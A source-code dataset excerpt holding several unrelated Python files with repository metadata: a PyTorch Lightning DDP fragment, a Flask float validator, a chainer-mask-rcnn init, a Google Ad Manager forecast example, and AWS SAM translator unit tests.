model = model.configure_ddp(model, device_ids)
# set up training routine
self.trainer.setup_training(model)
# train or test
results = self.trainer.train_or_test()
# get original model
model = self.trainer.get_model()
# persist info in ddp_spawn
self.trainer.transfer_distrib_spawn_state_on_fit_end(model, mp_queue, results)
# clean up memory
torch.cuda.empty_cache()
def training_step(self, args):
if self.trainer.amp_backend == AMPType.NATIVE:
with torch.cuda.amp.autocast():
output = self.trainer.model(*args)
else:
output = self.trainer.model(*args)
return output
def validation_step(self, args):
output = self.training_step(args)
return output
def test_step(self, args):
output = self.training_step(args)
return output
def training_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def validation_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def test_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
| true
| true
|
1c40bd1f8437ddf4868c4190e8316bf496f69d27
| 520
|
py
|
Python
|
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
src/flaskFormRequest/validators/float.py
|
edcilo/flaskFormRequest
|
5d346ab8821bdc6653dab9607f8a5d3d992b59d9
|
[
"MIT"
] | null | null | null |
from typing import Union
from .validator import Validator, ValidationError, StopValidation
class Float(Validator):
def __init__(self, message: Union[str, None] = None, parse: bool = True) -> None:
self.parse = parse
self.message = message or 'This field must be an float number.'
def parse_data(self, value):
return float(value)
def handler(self, value, field, request):
try:
value = float(value)
except:
raise StopValidation(self.message)
| 28.888889
| 85
| 0.648077
|
from typing import Union
from .validator import Validator, ValidationError, StopValidation
class Float(Validator):
def __init__(self, message: Union[str, None] = None, parse: bool = True) -> None:
self.parse = parse
self.message = message or 'This field must be an float number.'
def parse_data(self, value):
return float(value)
def handler(self, value, field, request):
try:
value = float(value)
except:
raise StopValidation(self.message)
| true
| true
|
1c40be8ea064575dc414f4074b3d5a872bc46e73
| 243
|
py
|
Python
|
chainer_mask_rcnn/functions/__init__.py
|
m3at/chainer-mask-rcnn
|
fa491663675cdc97974008becc99454d5e6e1d09
|
[
"MIT"
] | 61
|
2018-04-04T07:09:32.000Z
|
2021-11-12T19:54:23.000Z
|
chainer_mask_rcnn/functions/__init__.py
|
Swall0w/chainer-mask-rcnn
|
83366fc77e52aa6a29cfac4caa697d8b45dcffc6
|
[
"MIT"
] | 15
|
2018-04-10T10:48:47.000Z
|
2021-05-20T10:00:42.000Z
|
chainer_mask_rcnn/functions/__init__.py
|
Swall0w/chainer-mask-rcnn
|
83366fc77e52aa6a29cfac4caa697d8b45dcffc6
|
[
"MIT"
] | 18
|
2018-07-06T10:13:56.000Z
|
2022-03-02T12:25:31.000Z
|
# flake8: noqa
from .affine_channel_2d import affine_channel_2d
from .affine_channel_2d import AffineChannel2DFunction
from .crop_and_resize import crop_and_resize
from .roi_align_2d import roi_align_2d
from .roi_align_2d import ROIAlign2D
| 24.3
| 54
| 0.864198
|
from .affine_channel_2d import affine_channel_2d
from .affine_channel_2d import AffineChannel2DFunction
from .crop_and_resize import crop_and_resize
from .roi_align_2d import roi_align_2d
from .roi_align_2d import ROIAlign2D
| true
| true
|
1c40beeed5dbae5ac4bcf3d3ba9bff6de8b12127
| 3,988
|
py
|
Python
|
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202011/forecast_service/get_traffic_data.py
|
siilats/googleads-python-lib
|
d82a9cb75a4b2d602d02039536443f5b30157a43
|
[
"Apache-2.0"
] | 1
|
2021-06-23T09:15:34.000Z
|
2021-06-23T09:15:34.000Z
|
#!/usr/bin/env python
#
# Copyright 2020, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets the forecasted run-of-network traffic data."""
import datetime
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202011')
network_service = client.GetService('NetworkService', version='v202011')
# get the root ad unit ID to target the entire network.
root_ad_unit_id = network_service.getCurrentNetwork()['effectiveRootAdUnitId']
# Create a start date that's 7 days in the past and an end date that's 7 days
# in the future.
today = datetime.date.today()
start_date = today - datetime.timedelta(days=7)
end_date = today + datetime.timedelta(days=7)
# Create targeting.
targeting = {
'inventoryTargeting': {
'targetedAdUnits': [
{
'includeDescendants': True,
'adUnitId': root_ad_unit_id,
}
]
}
}
# Request the traffic forecast data.
traffic_data = forecast_service.getTrafficData({
'targeting': targeting,
'requestedDateRange': {
'startDate': start_date,
'endDate': end_date
}
})
# Display historical data.
historical_time_series = traffic_data['historicalTimeSeries']
if historical_time_series is None:
print('No historical data to display.')
else:
historical_start_date, historical_end_date = GetDatesFromForecastTimeSeries(
historical_time_series)
print('Historical Data:')
offset = 0
current_date = historical_start_date
while current_date <= historical_end_date:
print('%s: %d' % (current_date.isoformat(),
historical_time_series['values'][offset]))
offset += 1
current_date = historical_start_date + datetime.timedelta(days=offset)
# Display forecasted data.
forecasted_time_series = traffic_data['forecastedTimeSeries']
if forecasted_time_series is None:
print('No forecasted data to display.')
else:
forecasted_start_date, forecasted_end_date = GetDatesFromForecastTimeSeries(
forecasted_time_series)
print('Forecasted Data:')
offset = 0
current_date = forecasted_start_date
while current_date <= forecasted_end_date:
print('%s: %d' % (current_date.isoformat(),
forecasted_time_series['values'][offset]))
offset += 1
current_date = forecasted_start_date + datetime.timedelta(days=offset)
def GetDatesFromForecastTimeSeries(time_series):
"""Creates datetime.date objects from a forecast time series object.
Args:
time_series: The forecast time series containing start and end date info.
Returns:
A tuple of datetime.date objects, the first representing the start date and
the second representing the end date.
"""
date_range = time_series['timeSeriesDateRange']
start_date = datetime.date(
date_range['startDate']['year'],
date_range['startDate']['month'],
date_range['startDate']['day']
)
end_date = datetime.date(
date_range['endDate']['year'],
date_range['endDate']['month'],
date_range['endDate']['day']
)
return start_date, end_date
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| 32.16129
| 80
| 0.701354
|
import datetime
from googleads import ad_manager
def main(client):
forecast_service = client.GetService('ForecastService', version='v202011')
network_service = client.GetService('NetworkService', version='v202011')
root_ad_unit_id = network_service.getCurrentNetwork()['effectiveRootAdUnitId']
today = datetime.date.today()
start_date = today - datetime.timedelta(days=7)
end_date = today + datetime.timedelta(days=7)
targeting = {
'inventoryTargeting': {
'targetedAdUnits': [
{
'includeDescendants': True,
'adUnitId': root_ad_unit_id,
}
]
}
}
traffic_data = forecast_service.getTrafficData({
'targeting': targeting,
'requestedDateRange': {
'startDate': start_date,
'endDate': end_date
}
})
historical_time_series = traffic_data['historicalTimeSeries']
if historical_time_series is None:
print('No historical data to display.')
else:
historical_start_date, historical_end_date = GetDatesFromForecastTimeSeries(
historical_time_series)
print('Historical Data:')
offset = 0
current_date = historical_start_date
while current_date <= historical_end_date:
print('%s: %d' % (current_date.isoformat(),
historical_time_series['values'][offset]))
offset += 1
current_date = historical_start_date + datetime.timedelta(days=offset)
forecasted_time_series = traffic_data['forecastedTimeSeries']
if forecasted_time_series is None:
print('No forecasted data to display.')
else:
forecasted_start_date, forecasted_end_date = GetDatesFromForecastTimeSeries(
forecasted_time_series)
print('Forecasted Data:')
offset = 0
current_date = forecasted_start_date
while current_date <= forecasted_end_date:
print('%s: %d' % (current_date.isoformat(),
forecasted_time_series['values'][offset]))
offset += 1
current_date = forecasted_start_date + datetime.timedelta(days=offset)
def GetDatesFromForecastTimeSeries(time_series):
date_range = time_series['timeSeriesDateRange']
start_date = datetime.date(
date_range['startDate']['year'],
date_range['startDate']['month'],
date_range['startDate']['day']
)
end_date = datetime.date(
date_range['endDate']['year'],
date_range['endDate']['month'],
date_range['endDate']['day']
)
return start_date, end_date
if __name__ == '__main__':
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| true
| true
|
1c40bf9d2019a68825eb40f035446d1a2fc35654
| 35,667
|
py
|
Python
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 2
|
2019-04-13T16:57:10.000Z
|
2019-12-13T08:32:16.000Z
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 3
|
2021-06-08T22:29:43.000Z
|
2022-01-13T03:21:16.000Z
|
tests/translator/test_translator.py
|
Buffer0x7cd/serverless-application-model
|
805cc85bc26cfda16e9611c047e38f78560ad6e6
|
[
"Apache-2.0"
] | 1
|
2021-08-05T13:35:20.000Z
|
2021-08-05T13:35:20.000Z
|
import json
import itertools
import os.path
import hashlib
import sys
from functools import reduce, cmp_to_key
from samtranslator.translator.translator import Translator, prepare_plugins, make_policy_template_for_function_plugin
from samtranslator.parser.parser import Parser
from samtranslator.model.exceptions import InvalidDocumentException, InvalidResourceException
from samtranslator.model import Resource
from samtranslator.model.sam_resources import SamSimpleTable
from samtranslator.public.plugins import BasePlugin
from tests.translator.helpers import get_template_parameter_values
from tests.plugins.application.test_serverless_app_plugin import mock_get_region
from samtranslator.yaml_helper import yaml_parse
from parameterized import parameterized, param
import pytest
import yaml
from unittest import TestCase
from samtranslator.translator.transform import transform
from mock import Mock, MagicMock, patch
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = BASE_PATH + '/input'
OUTPUT_FOLDER = BASE_PATH + '/output'
# Do not sort AWS::Serverless::Function Layers Property.
# Order of Layers is an important attribute and shouldn't be changed.
DO_NOT_SORT = ['Layers']
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = os.path.join(BASE_PATH, 'input')
OUTPUT_FOLDER = os.path.join(BASE_PATH, 'output')
def deep_sort_lists(value):
"""
Custom sorting implemented as a wrapper on top of Python's built-in ``sorted`` method. This is necessary because
the previous behavior assumed lists were unordered. As part of migration to Py3, we are trying to
retain the same behavior. But in Py3, lists with complex data types like dict cannot be sorted. Hence
we provide a custom sort function that tries best sort the lists in a stable order. The actual order
does not matter as long as it is stable between runs.
This implementation assumes that the input was parsed from a JSON data. So it can have one of the
following types: a primitive type, list or other dictionaries.
We traverse the dictionary like how we would traverse a tree. If a value is a list, we recursively sort the members
of the list, and then sort the list itself.
This assumption that lists are unordered is a problem at the first place. As part of dropping support for Python2,
we should remove this assumption. We have to update SAM Translator to output lists in a predictable ordering so we
can assume lists are ordered and compare them.
"""
if isinstance(value, dict):
return {k: deep_sort_lists(v) for k, v in value.items()}
if isinstance(value, list):
if sys.version_info.major < 3:
# Py2 can sort lists with complex types like dictionaries
return sorted((deep_sort_lists(x) for x in value))
else:
# Py3 cannot sort lists with complex types. Hence a custom comparator function
return sorted((deep_sort_lists(x) for x in value), key=cmp_to_key(custom_list_data_comparator))
else:
return value
def custom_list_data_comparator(obj1, obj2):
"""
Comparator function used to sort lists with complex data types in them. This is meant to be used only within the
context of sorting lists for use with unit tests.
Given any two objects, this function will return the "difference" between the two objects. This difference obviously
does not make sense for complex data types like dictionaries & list. This function implements a custom logic that
is partially borrowed from Python2's implementation of such a comparison:
* Both objects are dict: Convert them JSON strings and compare
* Both objects are comparable data types (ie. ones that have > and < operators): Compare them directly
* Objects are non-comparable (ie. one is a dict other is a list): Compare the names of the data types.
ie. dict < list because of alphabetical order. This is Python2's behavior.
"""
if isinstance(obj1, dict) and isinstance(obj2, dict):
obj1 = json.dumps(obj1, sort_keys=True)
obj2 = json.dumps(obj2, sort_keys=True)
try:
return (obj1 > obj2) - (obj1 < obj2)
# In Py3 a TypeError will be raised if obj1 and obj2 are different types or uncomparable
except TypeError:
s1, s2 = type(obj1).__name__, type(obj2).__name__
return (s1 > s2) - (s1 < s2)
def mock_sar_service_call(self, service_call_function, logical_id, *args):
"""
Current implementation: args[0] is always the application_id
"""
application_id = args[0]
status = 'ACTIVE'
if application_id == "no-access":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "non-existent":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "invalid-semver":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == 1:
raise InvalidResourceException(logical_id, "Type of property 'ApplicationId' is invalid.".format(application_id))
elif application_id == "preparing" and self._wait_for_template_active_status < 2:
self._wait_for_template_active_status += 1
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 2
status = "PREPARING"
elif application_id == "preparing-never-ready":
self._wait_for_template_active_status = True
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 0
status = "PREPARING"
elif application_id == "expired":
status = "EXPIRED"
message = {
'ApplicationId': args[0],
'CreationTime': 'x',
'ExpirationTime': 'x',
'SemanticVersion': '1.1.1',
'Status': status,
'TemplateId': 'id-xx-xx',
'TemplateUrl': 'https://awsserverlessrepo-changesets-xxx.s3.amazonaws.com/signed-url'
}
return message
# implicit_api, explicit_api, explicit_api_ref, api_cache tests currently have deployment IDs hardcoded in output file.
# These ids are generated using sha1 hash of the swagger body for implicit
# api and s3 location for explicit api.
class TestTranslatorEndToEnd(TestCase):
@parameterized.expand(
itertools.product([
's3_with_condition',
'function_with_condition',
'basic_function',
'basic_application',
'application_preparing_state',
'basic_layer',
'cloudwatchevent',
'cloudwatch_logs_with_ref',
'cloudwatchlog',
'streams',
'sqs',
'simpletable',
'simpletable_with_sse',
'implicit_api',
'explicit_api',
'api_endpoint_configuration',
'api_with_auth_all_maximum',
'api_with_auth_all_minimum',
'api_with_auth_no_default',
'api_with_method_settings',
'api_with_binary_media_types',
'api_with_minimum_compression_size',
'api_with_resource_refs',
'api_with_cors',
'api_with_cors_and_only_methods',
'api_with_cors_and_only_headers',
'api_with_cors_and_only_origins',
'api_with_cors_and_only_maxage',
'api_with_cors_and_only_credentials_false',
'api_with_cors_no_definitionbody',
'api_cache',
'api_with_access_log_setting',
'api_with_canary_setting',
'api_with_xray_tracing',
's3',
's3_create_remove',
's3_existing_lambda_notification_configuration',
's3_existing_other_notification_configuration',
's3_filter',
's3_multiple_events_same_bucket',
's3_multiple_functions',
's3_with_dependsOn',
'sns',
'sns_existing_other_subscription',
'sns_topic_outside_template',
'alexa_skill',
'alexa_skill_with_skill_id',
'iot_rule',
'layers_with_intrinsics',
'layers_all_properties',
'function_managed_inline_policy',
'unsupported_resources',
'intrinsic_functions',
'basic_function_with_tags',
'depends_on',
'function_event_conditions',
'function_with_dlq',
'function_with_kmskeyarn',
'function_with_alias',
'function_with_alias_intrinsics',
'function_with_disabled_deployment_preference',
'function_with_deployment_preference',
'function_with_deployment_preference_all_parameters',
'function_with_deployment_preference_multiple_combinations',
'function_with_alias_and_event_sources',
'function_with_resource_refs',
'function_with_deployment_and_custom_role',
'function_with_deployment_no_service_role',
'function_with_global_layers',
'function_with_layers',
'function_with_many_layers',
'function_with_permissions_boundary',
'function_with_policy_templates',
'function_with_sns_event_source_all_parameters',
'globals_for_function',
'globals_for_api',
'globals_for_simpletable',
'all_policy_templates',
'simple_table_ref_parameter_intrinsic',
'simple_table_with_table_name',
'function_concurrency',
'simple_table_with_extra_tags',
'explicit_api_with_invalid_events_config',
'no_implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_auth_and_conditions_max',
'implicit_api_with_many_conditions',
'implicit_and_explicit_api_with_conditions',
'api_with_cors_and_conditions_no_definitionbody',
'api_with_auth_and_conditions_all_max'
],
[
("aws", "ap-southeast-1"),
("aws-cn", "cn-north-1"),
("aws-us-gov", "us-gov-west-1")
] # Run all the above tests against each of the list of partitions to test against
)
)
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_success(self, testcase, partition_with_region):
partition = partition_with_region[0]
region = partition_with_region[1]
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
# To uncover unicode-related bugs, convert dict to JSON string and parse JSON back to dict
manifest = json.loads(json.dumps(manifest))
partition_folder = partition if partition != "aws" else ""
expected = json.load(open(os.path.join(OUTPUT_FOLDER,partition_folder, testcase + '.json'), 'r'))
with patch('boto3.session.Session.region_name', region):
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AWSLambdaBasicExecutionRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole'.format(partition),
'AmazonDynamoDBFullAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBFullAccess'.format(partition),
'AmazonDynamoDBReadOnlyAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBReadOnlyAccess'.format(partition),
'AWSLambdaRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaRole'.format(partition),
}
output_fragment = transform(
manifest, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
# Only update the deployment Logical Id hash in Py3.
if sys.version_info.major >= 3:
self._update_logical_id_hash(expected)
self._update_logical_id_hash(output_fragment)
assert deep_sort_lists(output_fragment) == deep_sort_lists(expected)
def _update_logical_id_hash(self, resources):
"""
Brute force method for updating all APIGW Deployment LogicalIds and references to a consistent hash
"""
output_resources = resources.get("Resources", {})
deployment_logical_id_dict = {}
rest_api_to_swagger_hash = {}
dict_of_things_to_delete = {}
# Find all RestApis in the template
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::RestApi" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
if "Body" in resource_properties:
self._generate_new_deployment_hash(logical_id, resource_properties.get("Body"), rest_api_to_swagger_hash)
elif "BodyS3Location" in resource_dict.get("Properties"):
self._generate_new_deployment_hash(logical_id,
resource_properties.get("BodyS3Location"),
rest_api_to_swagger_hash)
# Collect all APIGW Deployments LogicalIds and generate the new ones
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Deployment" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId").get("Ref")
data_hash = rest_api_to_swagger_hash.get(rest_id)
description = resource_properties.get("Description")[:-len(data_hash)]
resource_properties["Description"] = description + data_hash
new_logical_id = logical_id[:-10] + data_hash[:10]
deployment_logical_id_dict[logical_id] = new_logical_id
dict_of_things_to_delete[logical_id] = (new_logical_id, resource_dict)
# Update References to APIGW Deployments
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Stage" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId", {}).get("Ref", "")
data_hash = rest_api_to_swagger_hash.get(rest_id)
deployment_id = resource_properties.get("DeploymentId", {}).get("Ref")
new_logical_id = deployment_logical_id_dict.get(deployment_id, "")[:-10]
new_logical_id = new_logical_id + data_hash[:10]
resource_properties.get("DeploymentId", {})["Ref"] = new_logical_id
# To avoid mutating the template while iterating, delete only after find everything to update
for logical_id_to_remove, tuple_to_add in dict_of_things_to_delete.items():
output_resources[tuple_to_add[0]] = tuple_to_add[1]
del output_resources[logical_id_to_remove]
# Update any Output References in the template
for output_key, output_value in resources.get("Outputs", {}).items():
if output_value.get("Ref") in deployment_logical_id_dict:
output_value["Ref"] = deployment_logical_id_dict[output_value.get("Ref")]
def _generate_new_deployment_hash(self, logical_id, dict_to_hash, rest_api_to_swagger_hash):
data_bytes = json.dumps(dict_to_hash, separators=(',', ':'), sort_keys=True).encode("utf8")
data_hash = hashlib.sha1(data_bytes).hexdigest()
rest_api_to_swagger_hash[logical_id] = data_hash
@pytest.mark.parametrize('testcase', [
'error_api_duplicate_methods_same_path',
'error_api_invalid_auth',
'error_api_invalid_definitionuri',
'error_api_invalid_definitionbody',
'error_api_invalid_restapiid',
'error_application_properties',
'error_application_does_not_exist',
'error_application_no_access',
'error_application_preparing_timeout',
'error_cors_on_external_swagger',
'error_invalid_cors_dict',
'error_cors_credentials_true_with_wildcard_origin',
'error_cors_credentials_true_without_explicit_origin',
'error_function_invalid_codeuri',
'error_function_invalid_layer',
'error_function_no_codeuri',
'error_function_no_handler',
'error_function_no_runtime',
'error_function_with_deployment_preference_missing_alias',
'error_function_with_invalid_deployment_preference_hook_property',
'error_invalid_logical_id',
'error_layer_invalid_properties',
'error_missing_queue',
'error_missing_startingposition',
'error_missing_stream',
'error_multiple_resource_errors',
'error_s3_not_in_template',
'error_table_invalid_attributetype',
'error_invalid_resource_parameters',
'error_reserved_sam_tag',
'existing_event_logical_id',
'existing_permission_logical_id',
'existing_role_logical_id',
'error_invalid_template',
'error_globals_is_not_dict',
'error_globals_unsupported_type',
'error_globals_unsupported_property',
'error_globals_api_with_stage_name',
'error_function_policy_template_with_missing_parameter',
'error_function_policy_template_invalid_value',
'error_function_with_unknown_policy_template',
'error_function_with_invalid_policy_statement'
])
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_invalid_document(testcase):
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
expected = json.load(open(os.path.join(OUTPUT_FOLDER, testcase + '.json'), 'r'))
mock_policy_loader = MagicMock()
parameter_values = get_template_parameter_values()
with pytest.raises(InvalidDocumentException) as e:
transform(manifest, parameter_values, mock_policy_loader)
error_message = get_exception_error_message(e)
assert error_message == expected.get('errorMessage')
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_unhandled_failure_empty_managed_policy_map():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Function',
'Properties': {
'CodeUri': 's3://bucket/key',
'Handler': 'index.handler',
'Runtime': 'nodejs4.3',
'Policies': 'AmazonS3FullAccess'
}
}
}
}
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {}
with pytest.raises(Exception) as e:
transform(document, parameter_values, mock_policy_loader)
error_message = str(e.value)
assert error_message == 'Managed policy map is empty, but should not be.'
def assert_metric_call(mock, transform, transform_failure=0, invalid_document=0):
metric_dimensions = [
{
'Name': 'Transform',
'Value': transform
}
]
mock.put_metric_data.assert_called_once_with(
Namespace='ServerlessTransform',
MetricData=[
{
'MetricName': 'TransformFailure',
'Value': transform_failure,
'Unit': 'Count',
'Dimensions': metric_dimensions
},
{
'MetricName': 'InvalidDocument',
'Value': invalid_document,
'Unit': 'Count',
'Dimensions': metric_dimensions
}
]
)
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_body_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionBody": {
# Some body property will do
"a": "b"
}
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionBody"]["a"] = "foo"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
# Now let's re-deploy the document without any changes. Deployment Key must NOT change
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_definitionuri_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionUri": "s3://bucket/key"
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionUri"] = "s3://bucket/key1/key2"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
# Now let's re-deploy the document without any changes. Deployment Key must NOT change
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
class TestFunctionVersionWithParameterReferences(TestCase):
"""
Test how Lambda Function Version gets created when intrinsic functions
"""
def setUp(self):
self.document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'MyFunction': {
'Type': 'AWS::Serverless::Function',
'Properties': {
"Runtime": "nodejs4.3",
"Handler": "index.handler",
"CodeUri": {
"Bucket": {"Ref": "SomeBucket"},
"Key": {"Ref": "CodeKeyParam"}
},
"AutoPublishAlias": "live"
}
}
}
}
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_change_with_parameters(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
parameter_values["CodeKeyParam"] = "value2"
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id != second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_remains_same_without_parameter_change(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_without_resolving_reference(self):
# Now value of `CodeKeyParam` is not present in document
first_transformed_template = self._do_transform(self.document)
second_transformed_template = self._do_transform(self.document)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
def _do_transform(self, document, parameter_values=get_template_parameter_values()):
mock_policy_loader = get_policy_mock()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
return output_fragment
class TestParameterValuesHandling(TestCase):
"""
Test how user-supplied parameters & default template parameter values from template get merged
"""
def test_add_default_parameter_values_must_merge(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param2": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1",
"Param2": "template default"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template,
parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_override_user_specified_values(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_skip_params_without_defaults(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String"
},
"Param2": {
"Type": "String"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
@parameterized.expand([
# Array
param(["1", "2"]),
# String
param("something"),
# Some other non-parameter looking dictionary
param({"Param1": {"Foo": "Bar"}}),
param(None)
])
def test_add_default_parameter_values_must_ignore_invalid_template_parameters(self, template_parameters):
parameter_values = {
"Param1": "value1"
}
expected = {
"Param1": "value1"
}
sam_template = {
"Parameters": template_parameters
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(
sam_template, parameter_values)
self.assertEqual(expected, result)
class TestTemplateValidation(TestCase):
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_not_found(self):
template = {
"foo": "bar"
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
